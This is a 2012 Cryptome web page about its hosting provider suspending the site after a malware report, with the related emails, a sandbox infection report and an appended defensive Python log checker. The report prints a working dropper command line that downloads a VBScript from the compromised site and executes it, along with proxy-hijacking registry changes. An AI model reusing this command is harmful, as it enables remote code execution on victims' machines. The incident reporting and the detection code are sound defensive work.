14 March 2012.
A reader writes that cryptome-shut.htm is reported to be malware due to the
contents of Steve Wiley's email reporting infection of Cryptome files.
In the past Cryptome has received claims that it is hosting malware because
files contain the names of malware but not the malware (an email in the
cypherpunks archive).
In a few other cases Cryptome has hosted malware needed for research and
defense against malware -- such as the DIRT trojan -- those files are also
reported as malware.
Recently the HBGary cache of malware research contained large numbers of
actual malware; when selections were hosted on Cryptome those files also
produced malware reports.
There are also instances of infected files cached by Google's and other
aggregators' siphoning of Cryptome setting off malware alarms, because the cached
and purloined files are delivered to users rather than the subsequently cleaned
files on Cryptome.
Take it or leave it, both Google and Norton report Cryptome is safe and free
of infection even while malware sleuths claim it is infected. Malware claims
are growing as publicity about them increases, similar to cybersecurity panic
in general.
Our latest Norton protection program is obnoxiously abusive: hogs CPU, delays
email unnecessarily, blares warnings, pop-ups in the middle of work demanding
attention, behaving like an authoritarian spy and police officer claiming
to protect when it is merely hawking its blind faith religion.
Zealots of cleanliness all too often turn out to be Typhoid Marys due to
ignorance about how infection is spread and promulgation of half-baked hygienic
methods more dangerous than vermin.
Cryptome advises avoidance of Cryptome as insecure and infected and to protect
yourself against those pushing security and purity.
13 March 2012.
Cryptome.org has moved to a new ISP. For now February-March 2012 files are
available. All the files will be gradually added.
The IT person and Network Solutions have apologized for the shutdown. By
then all files had been deleted from the NetSol site and the domain transferred
to a new ISP.
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: "'Lee [at} Royal Gardens'" <lee[at}royalgardens.us>,
"jya[at}pipeline.com"<jya[at}pipeline.com>
Date: Mon, 12 Mar 2012 18:50:56 -0700
Subject: RE: Cryptome Downed
Please accept my apologies. I am sorry if I have alarmed you or caused
any trouble. I am on your side. I am not blaming you for anything.
I merely alerted you directly and timely to what I believed was a
substantial problem with your website, with an eye solely towards helping
you preserve your visitors' security and, by extension, your reputation.
I alerted your ISP in the same email I alerted you, for the same reason -
to help you preserve your site reputation. If you are on vacation, if your
registrar has outdated contact info for you etc, your ISP may be the
only one who I am able to contact quickly. I contact all manner of site operators
daily, and most are in no position to help themselves, so I always include
their ISP. Most of the time the ISP is the only person who gets my email;
I usually get bounces from the other email addresses I try. Most sites
are on hosted servers, so alerting the ISP to fix one server may preserve
the integrity of many hundreds of domains as well as their
visitors'/clients'/employees' computers from infection.
I see you have had some disagreements with ISPs in the past, and I want to
assure you that I did not know that before I communicated with you or your
ISP. I do not want to cause any trouble for you, I only want to help
you. I do not have any agenda other than helping people whose sites
have been hacked. Sometimes I have little time to compose the emails,
and in my haste to alarm people to trouble my communications come off somewhat
terse. Sometimes my attempts at helping blow up in my face, and I am
constantly reminded of the ancient phrase which surely has resulted in much
hilarity over the eons: don't shoot the messenger (please). Again, please
accept my apologies.
_____
Subject: Network Solutions - Service Request 1-583317019
Date: Tue, 13 Mar 2012 00:11:29 -0400
From: "Network Solutions Support"
<siebelcustserv[at}networksolutions.com>
To: "John Young" <jya[at}pipeline.com>,
<cryptome[at}earthlink.net>
Dear John,
I am sorry to hear that your site was suspended. We have removed the
suspension and we have technicians available that can restore the content
which you removed from the server. If you would like us to restore
this content for you, please email listen[at}networksolutions.com.
This email is monitored by my team, as well as others, 24/7 and we can get
the content restored fairly quickly.
If you have any questions regarding this specific Service Request, you can
chat directly with our Technical Support team by clicking on the following
link:
http://www.networksolutions.com/dms/support.jsp
If you have any other questions please visit our comprehensive support section
at
http://www.networksolutions.com/support/
or contact our Support Center and refer to Service Request 1-583317019 and
a specialist will be happy to further assist you and ensure that we completely
resolve your issue as quickly as possible.
Special Offer - 11% off on a new purchase. Valid on new purchases only. Does
not include Web Design, Pay-Per-Click, or SEO offerings. See below for details.
We understand that waiting on resolution for an issue is sometimes
frustrating. We appreciate all of our customers, and our commitment
to you is to provide the fastest service possible without sacrificing
quality. For any inconveniences that you may have endured, please feel
free to take advantage of the following offer:
http://ads.networksolutions.com/landing?code=P99C383S603N0B11A1D38E0000V100&promo=GCMKT00043
Thank You,
Daniel
Technical Services
Network Solutions
http://www.networksolutions.com/support/
US/Can: 1.866.391.4357
International: 1.570.708.8788
12 March 2012
Cryptome Shut by Network Solutions
Cryptome was shut down by its ISP, Network Solutions, at 12/Mar/2012:14:30:37
-0400 in response to an IT person reporting an infection. Messages:
Subject: Network Solutions Policy Violation - Reference number 1-583317019
Date: Mon, 12 Mar 2012 15:24:09 -0400
From: "Network Solutions Support" <siebelcustserv[at}networksolutions.com>
To: "John Young" <jya[at}pipeline.com>
Dear John,
Your hosting package 01938F7.NETSOLHOST.COM was suspended because it is
compromised due to vulnerabilities in your website code. I apologize for
any inconvenience this may have caused. You will need to remove any and
all malicious code, as well as secure the code itself which is allowing
these vulnerabilities to occur. Below is an example of one of the malicious
URLs which are being used. I would also recommend changing any ftp passwords
which you have configured.
One of many malicious URLs: hxxp://cryptome.org//Index/content/hcp_vbs.php?f=16&d=0
There may be other compromised content which was not discovered which should be
removed as well.
If you have any other questions please visit our comprehensive support section at
http://www.networksolutions.com/support/ or contact our Support Center and refer
to Service Request 1-583317019 and a specialist will be happy to further assist
you and ensure that we completely resolve your issue as quickly as possible.
Thank You,
Daniel
Technical Services
Network Solutions
http://www.networksolutions.com/support/
US/Can: 1.866.391.4357
International: 1.570.708.8788
Message No. 1 from IT person:
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: "'noc[at}networksolutions.com'" <noc[at}networksolutions.com>,
"'abuse[at}networksolutions.com'" <abuse[at}networksolutions.com>
CC: "'cryptome[at}earthlink.net'" <cryptome[at}earthlink.net>,
"'jya[at}pipeline.com'"<jya[at}pipeline.com>
Date: Mon, 12 Mar 2012 11:25:44 -0700
Subject: Infected host at IP 205.178.145.72 cryptome.org
The site cryptome.org at IP 205.178.145.72 is hosting malicious binaries.
Analysis and original PCAP is below.
One of many malicious URLs: hxxp://cryptome.org//Index/content/hcp_vbs.php?f=16&d=0
PCAP:
IP 10.1.1.86.1867 > 205.178.145.72.80: tcp 171
GET /Index/w.php?f=16&e=0 HTTP/1.1
User-Agent: Java/1.6.0_21
Host: cryptome.org
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 0
IP 205.178.145.72.80 > 10.1.1.86.1867: tcp 1448
HTTP/1.1 200 OK
Date: Mon, 12 Mar 2012 16:33:50 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8e DAV/2 PHP/5.3.2 with Suhosin-Patch
X-Powered-By: PHP/5.3.2
Pragma: public
Expires: Mon, 12 Mar 2012 16:34:45 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Content-Length: 360960
Content-Type: application/x-msdownload
Set-Cookie: client=done; expires=Tue, 13-Mar-2012 16:33:51 GMT; path=/
Keep-Alive: timeout=5, max=400
Connection: Keep-Alive
BINARY ANALYSIS:
Orig. Traffic Capture J-10.1.1.86-322348.pcappcap 436027 bytes (text)
VM Capture W9223397244018158380-79636-201-2012-03-12-173747.pvna.pcappcap 220175 bytes (text)
Source Host: xxxxVM.downeybrand.com
Src IP: 10.x.x.86
Src MAC Address: 00:22:0d:4e:89:c2
Malware: Exploit.Browser
Analysis OS: Microsoft WindowsXP Professional 5.1 sp3
Bot Communication Details:
Server DNS Name: cryptome.org
Infection URLs:
DL URL                                  Occurred           Content Type
cryptome.org/blm042408.htm              03/12/12 17:37:32  text/html
cryptome.org/Index/index.php            03/12/12 17:37:39  text/html
cryptome.org/Index/content/Jas.jar      03/12/12 17:37:47
cryptome.org/Index/com.class            03/12/12 17:37:48  text/html
cryptome.org/Index/edu.class            03/12/12 17:37:48  text/html
cryptome.org/Index/net.class            03/12/12 17:37:49  text/html
cryptome.org/Index/org.class            03/12/12 17:37:49  text/html
cryptome.org/Index/w.php?f=16&e=0       03/12/12 17:38:45
OS Change Detail | Items: 55 | OS Info: Microsoft WindowsXP Professional 5.1 sp3
Columns: Type | Mode/Class | Details (Path/Message/Protocol/Hostname/Qtype/ListenPort etc.) | Process ID | Parent ID | File Size
Process Started C:\WINDOWS\system32\cmd.exe
Packed: no GUI: no
Parentname: C:\WINDOWS\pchealth\helpctr\binaries\helpctr.exe
Command Line: "C:\WINDOWS\system32\cmd.exe" /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://cryptome.org//Index/content/hcp_vbs.php?f=16&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\l.vbs && C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\l.vbs && taskkill /F /IM helpctr.exe 2464 444
Malicious Alert Anomaly Tag Message: Startup behavior anomalies observed
Detail: A new process has been launched
Mutex \BaseNamedObjects\SHIMLIB_LOG_MUTEX 2464
Mutex Imagepath: C:\WINDOWS\system32\cmd.exe 2464
File Created C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs 2464
File Close C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs
MD5: df2ce7c80bd3f1170b46c3adb4d6c6eb
SHA1: 4389878cb1c3e83abac7817336a55834b9d845b1 2464 349
Mutex Imagepath: C:\WINDOWS\system32\cmd.exe 2464
File Open C:\Documents and Settings\Administrator\My Documents\desktop.ini 2464 84
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2464
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2464
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2464
Process Started C:\WINDOWS\system32\cscript.exe
Packed: no GUI: no
Parentname: C:\WINDOWS\system32\cmd.exe
Command Line: "C:\WINDOWS\System32\CScript.exe" //nologo "C:\DOCUME~1\ADMINI~1\
LOCALS~1\Temp\l.vbs" 2492 2464
Network Connected Protocol Type: udp Destination Port: 1057 IP Address:
127.0.0.1
Imagepath: C:\WINDOWS\system32\cscript.exe 2492
Network Connect Protocol Type: tcp Destination Port: 8080 IP Address:
10.0.0.2
Imagepath: C:\WINDOWS\system32\cscript.exe 2492
Mutex \BaseNamedObjects\SHIMLIB_LOG_MUTEX 2492
Mutex Imagepath: C:\WINDOWS\system32\cscript.exe 2492
File Open C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat 2492 458752
Folder Open C:\Documents and Settings\Administrator\Cookies 2492
File Open C:\Documents and Settings\Administrator\Cookies\index.dat 2492 32768
File Open C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat 2492 81920
Mutex Imagepath: C:\WINDOWS\system32\cscript.exe 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\"ProxyEnable" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software
Microsoft\Windows\CurrentVersion
\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 08 04 00 00
03 00 00 00 0d 00
00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 0
0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2492
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2492
Mutex \BaseNamedObjects\ZoneAttributeCacheCounterMutex 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"IntranetName" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\"ProxyEnable" = 0x00000001 2492
Regkey Setval \REGISTRY\USER\S-1-5-21-527237240-1580818891-725345543-500\Software\
Microsoft\Windows\CurrentVersion
\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 09 04 00 00
03 00 00 00 0d 00
00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 0
0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2492
File Open C:\Documents and Settings\Administrator\Cookies\administrator[at}cryptome[1].txt
MD5: ed4a45a7588fad273b23c6e409593c56
SHA1: 6bfdb93fffa62e01d97a724e6a56c15242b54d6b 2492 72
File Created C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXYNKLQB\hcp_vbs[1].jpg 2492
File Close C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXYNKLQB\hcp_vbs[1].jpg
MD5: 3ac9a0c8a8a5ec6d3aba629bf66f9fb1
SHA1: 5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e 2492 28672
File Overwritten C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs
MD5: df2ce7c80bd3f1170b46c3adb4d6c6eb
SHA1: 4389878cb1c3e83abac7817336a55834b9d845b1 2492 349
File Close C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\l.vbs
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 2492 349
Process Terminated C:\WINDOWS\system32\cscript.exe
Parentname: C:\WINDOWS\system32\cmd.exe 2492 2464
Process Started C:\WINDOWS\system32\taskkill.exe
Packed: no GUI: no
Parentname: C:\WINDOWS\system32\cmd.exe 2628 2464
Malicious Alert Misc Anomaly Message: External process termination
Detail: Malware trying to terminate an external process
Mutex \BaseNamedObjects\SHIMLIB_LOG_MUTEX 2628
Mutex Imagepath: C:\WINDOWS\system32\taskkill.exe 2628
Mutex Imagepath: C:\WINDOWS\system32\taskkill.exe 2628
Process Terminated C:\WINDOWS\system32\taskkill.exe
Parentname: C:\WINDOWS\system32\cmd.exe 2628 2464
End Of Report
CONFIDENTIALITY NOTICE: This communication and any accompanying
document(s) are confidential and privileged. They are intended for
the sole use of the addressee. If you receive this transmission in
error, you are advised that any disclosure, copying, distribution, or
the taking of any action in reliance upon the communication is
strictly prohibited. Moreover, any such inadvertent disclosure shall
not compromise or waive the attorney-client privilege as to this
communication or otherwise. If you have received this communication
in error, please contact our IS Department at its Internet email address
(is[at}downeybrand.com), or by telephone at (916)444-1000 x5325. Thank
you.
[Eight inline images attached to the message, Picture (Metafile) 1.jpg through 8.jpg (created Mon, 12 Mar 2012 11:14 GMT), are not reproduced here.]
Message No. 2 from IT person:
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: 'John Young' <jya[at}pipeline.com>
CC: "'noc[at}networksolutions.com'" <noc[at}networksolutions.com>,
"'abuse[at}networksolutions.com'" <abuse[at}networksolutions.com>
Date: Mon, 12 Mar 2012 11:58:32 -0700
Subject: RE: Infected host at IP 205.178.145.72 cryptome.org
Denial is easy, finding this will take a professional. The malicious binary
was transmitted by your server and the activity below was recorded. Websense,
FireEye, and Trend Micro all point to your IP as the infection source -
independent alarms went off simultaneously. That is three large, disparate
security companies pointing at you. The PCAP proves a BINARY was transmitted
FROM YOUR SERVER. What more do you need?
Kind regards,
Steve Wiley
Network Operations Manager
DOWNEY BRAND
621 Capitol Mall, 18th Floor
Sacramento, CA 95814
916/520-5269 Direct
916/520-5669 Fax
swiley[at}downeybrand.com
http://www.downeybrand.com
From: John Young [mailto:jya[at}pipeline.com]
Sent: Monday, March 12, 2012 11:53 AM
To: Wiley, Steve
Cc: 'noc[at}networksolutions.com'; 'abuse[at}networksolutions.com'
Subject: Re: Infected host at IP 205.178.145.72 cryptome.org
There are no malicious binaries nor infection in the files cited.
Only one of the files cited exists, blm042808.htm, and it has
been checked and found clean.
Most of the files cited do not exist and appear generated by
a rogue attack algorithm. Our access log shows several such
attacks and probes for vulnerabilities.
An attacker may be using your email to spread misinformation
or using your computer system to mount remote attacks.
Much of your message arrived as gibberish which may indicate
it is a forgery.
Nasty stuff on the net and rapidly increasing.
Best regards,
John Young
Administrator
Cryptome.org
Message No. 3 from IT person:
From: "Wiley, Steve" <swiley[at}DowneyBrand.com>
To: 'John Young' <jya[at}pipeline.com>
CC: "'noc[at}networksolutions.com'" <noc[at}networksolutions.com>,
"'abuse[at}networksolutions.com'" <abuse[at}networksolutions.com>
Date: Mon, 12 Mar 2012 12:06:55 -0700
Subject: RE: Infected host at IP 205.178.145.72 cryptome.org
Here is some PRO HELP.
The Sucuri scanner also shows you infected.
[Screenshot of the Sucuri scanner result not reproduced.]
We have a log of everything that happened. My user opened a new browser, went
to Google and did a GOOGLE SEARCH for
BLM NEPA
A link from your site comes up as the fourth or fifth hit. My user clicked this
link. Fit hit the shan.
The malware may only present itself when the referer is Google. If you are brave,
perform the same search and click the link from a clean machine ready for malware
research (get your HTTPwatch ready) from a PUBLIC IP THAT HAS NEVER VISITED YOUR
SERVER, because these hackers are known to record IPs and dish out malware selectively
to prevent followup security research from IPs of visitors that they try to infect.
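Added example, not code from Cryptome or from either correspondent: a checker written from the site administrator's side (John Young mentions the access log; message 3 describes referer-dependent serving). It runs over Apache combined-format access-log lines, constructed here to mirror the report's infection-URL list, flags the /Index/ kit paths and Java-client fetches of .php URLs, reports paths whose 200 responses differ in size with and without a Google referer, and checks captured response headers for a script URL answering with a Windows executable as w.php did in the PCAP. All log lines, sizes, IPs and header text are constructed.

```python
import re
from collections import defaultdict

# Apache "combined" log format (the captured server identifies itself as Apache/2.2.15).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Landing-kit paths taken from the report's infection-URL list and the PCAP.
KIT_PATH_RE = re.compile(
    r'^/+Index/(content/(Jas\.jar|hcp_vbs\.php)|w\.php|index\.php|\w+\.class)', re.I)
GOOGLE_REF_RE = re.compile(r'^https?://(www\.)?google\.', re.I)


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['size'] = 0 if rec['size'] == '-' else int(rec['size'])
    return rec


def flag_request(rec):
    """Indicators for one record: a known kit path, or a Java client pulling a .php URL."""
    hits = []
    if KIT_PATH_RE.search(rec['path']):
        hits.append('kit-path')
    if rec['ua'].startswith('Java/') and rec['path'].split('?')[0].lower().endswith('.php'):
        hits.append('java-php-fetch')
    return hits


def find_referer_cloaking(records):
    """Paths answered 200 both with and without a Google referer, but never with the same size."""
    by_path = defaultdict(lambda: {'google': set(), 'other': set()})
    for r in records:
        if r['status'] != 200:
            continue
        bucket = 'google' if GOOGLE_REF_RE.match(r['referer']) else 'other'
        by_path[r['path'].split('?')[0]][bucket].add(r['size'])
    return sorted(p for p, b in by_path.items()
                  if b['google'] and b['other'] and b['google'].isdisjoint(b['other']))


def executable_from_script(path, header_block):
    """True when a script URL answers with a Windows executable (x-msdownload or *.exe attachment)."""
    headers = {}
    for line in header_block.splitlines()[1:]:  # skip the status line
        if ':' in line:
            k, v = line.split(':', 1)
            headers[k.strip().lower()] = v.strip()
    ctype = headers.get('content-type', '').lower()
    cdisp = headers.get('content-disposition', '').lower()
    return (path.split('?')[0].lower().endswith(('.php', '.jsp', '.asp'))
            and ('x-msdownload' in ctype
                 or re.search(r'filename="?[^";]+\.exe', cdisp) is not None))


def analyse(log_text):
    """Flag individual requests and referer-dependent paths across a whole log."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    flagged = []
    for r in records:
        hits = flag_request(r)
        if hits:
            flagged.append((r['path'], hits))
    return {'flagged': flagged, 'cloaked_paths': find_referer_cloaking(records)}


# Constructed sample log: one victim chain following the report's timeline (Google
# search, landing page, kit, Java applet, payload), plus two ordinary visitors.
SAMPLE_LOG = """\
10.1.1.86 - - [12/Mar/2012:16:33:40 +0000] "GET /blm042408.htm HTTP/1.1" 200 21744 "http://www.google.com/search?q=BLM+NEPA" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
10.1.1.86 - - [12/Mar/2012:16:33:41 +0000] "GET /Index/index.php HTTP/1.1" 200 5120 "http://cryptome.org/blm042408.htm" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
10.1.1.86 - - [12/Mar/2012:16:33:47 +0000] "GET /Index/content/Jas.jar HTTP/1.1" 200 12288 "-" "Java/1.6.0_21"
10.1.1.86 - - [12/Mar/2012:16:33:50 +0000] "GET /Index/w.php?f=16&e=0 HTTP/1.1" 200 360960 "-" "Java/1.6.0_21"
192.0.2.10 - - [12/Mar/2012:18:02:11 +0000] "GET /blm042408.htm HTTP/1.1" 200 21101 "-" "Mozilla/5.0 (Windows NT 6.1)"
192.0.2.11 - - [12/Mar/2012:18:05:00 +0000] "GET /cryptome-shut.htm HTTP/1.1" 200 9000 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Constructed response headers, modelled on those shown in the PCAP above.
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache/2.2.15 (FreeBSD)
Content-Disposition: attachment; filename="info.exe"
Content-Length: 360960
Content-Type: application/x-msdownload
"""

if __name__ == '__main__':
    result = analyse(SAMPLE_LOG)
    for path, hits in result['flagged']:
        print(path, hits)
    print('referer-dependent paths:', result['cloaked_paths'])
    print('w.php served an executable:',
          executable_from_script('/Index/w.php?f=16&e=0', SAMPLE_RESPONSE))
```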